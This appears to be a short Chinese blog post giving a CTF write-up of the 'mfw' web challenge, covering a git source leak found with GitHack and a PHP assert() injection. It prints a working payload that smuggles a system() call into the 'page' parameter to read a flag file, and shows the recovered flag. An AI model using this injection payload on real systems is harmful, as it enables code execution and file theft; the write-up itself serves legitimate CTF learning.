Web – mfw – WriteUp
可谁还记得我呢
发表于 2020-6-3
# mfw ## 题目 ![1.png](https://i.loli.net/2020/06/03/npcG1OFPkCQmtBL.png) ## 工具 GitHack ## 思路 打开题目场景,检查网站,发现这样一个页面 ![2.png](https://i.loli.net/2020/06/03/cTaMZwFkKjPxhOq.png) 感觉存在git泄露 ![3.png](https://i.loli.net/2020/06/03/4rgjBxGKtMIwQNu.png)) ![R_H_03SN_Q8FW2YB_52_1A8.png](https://i.loli.net/2020/06/03/8gBR7M6XHLAZdeo.png) ```php assert() 检查一个断言是否为 FALSE strpos() 函数查找字符串在另一字符串中第一次出现的位置。如果没有找到则返回False file_exists() 函数检查文件或目录是否存在。 assert()函数会将括号中的字符当成代码来执行,并返回true或false。 ``` payload:`?page=1') or system("cat templates/flag.php");//` flag:在源代码中可以看到 ```php <!--?php $FLAG="cyberpeace{183f57e79cdef0ef3daab1a5c9bddf45}"; ?--> ```
ldeus
只是一个什么都做不到的普通人
友链
Powered by CloudFlare Workers |
Github
© 2020 ldeus' Blog